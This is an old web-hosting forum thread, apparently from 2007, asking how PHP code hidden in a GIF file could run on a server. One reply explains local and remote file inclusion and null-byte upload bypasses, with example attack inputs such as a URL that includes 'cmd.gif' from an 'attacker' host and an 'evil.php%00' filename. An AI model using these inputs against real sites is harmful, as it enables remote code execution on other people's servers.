Portal Home > Knowledgebase > Articles Database > PHP/GIF Exploit
PHP/GIF Exploit
Posted by SI-Chris, 06-23-2007, 05:47 PM |
I read about a new exploit that imbeds PHP code in a GIF file:
http://news.com.com/8301-10784_3-9731991-7.html
How would that work exactly? Wouldn't a server have to be set up specifically to parse PHP code in gif files? Who would set up their server that way? Is there a way around that so you can remotely trick the server into parsing gif files as PHP code?
|
Posted by b3nz, 06-23-2007, 06:08 PM |
I didn't read this article but there are some ways to embed php codes in a file with any extension you like !
Local File Inclusion and Remote File inclusion are the main methodes !, Ofcourse you can upload a php shell with .php.gif extension with using of null bytes like %00 in some portals
anyway, yes, it's possible and it's not an exploit
|
Posted by SI-Chris, 06-23-2007, 06:34 PM |
According to the article (it's only a few paragraphs long), the code is executed when someone tries to view the image after it's uploaded. So I don't understand how that would work unless someone had specifically configured their server to parse .gif files as PHP, and again, who would do that? Is there something I'm missing?
|
Posted by b3nz, 06-23-2007, 06:51 PM |
Imagine that there's a vulnerable portal installed on a server which allows you to execute local files with a url like http://victim/script.php?variable=[file-address], so you upload a file such as cmd.gif as your avatar or ... in that script and then you use the url for executing
another way that called as RFI ( remote file inclusion ) allows you to include a file with any extension like cmd.gif from a foreign host, look this code :
now the attacker can use http://victim/script.php?var=http://attacker/cmd.gif and executing his codes on server
and there's another vulnerability in some scripts which uploads file on server, the attacker wants to upload his evil.php on server but the script doesn't allow .php files to be uploaded, so the attacker rename his file to evil.php%00 ( %00 is a null byte ) and tricks the script
|
Add to Favourites Print this Article
Also Read
WH4L (Views: 681)